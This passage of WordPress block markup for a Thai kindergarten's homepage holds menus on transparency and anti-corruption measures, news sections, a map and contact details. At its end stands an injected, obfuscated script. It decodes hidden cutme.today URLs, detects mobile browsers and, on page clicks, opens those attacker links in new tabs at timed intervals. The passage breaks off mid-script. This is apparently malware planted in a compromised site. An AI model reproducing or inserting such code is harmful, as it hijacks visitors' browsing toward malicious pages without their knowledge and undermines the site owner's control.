500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else 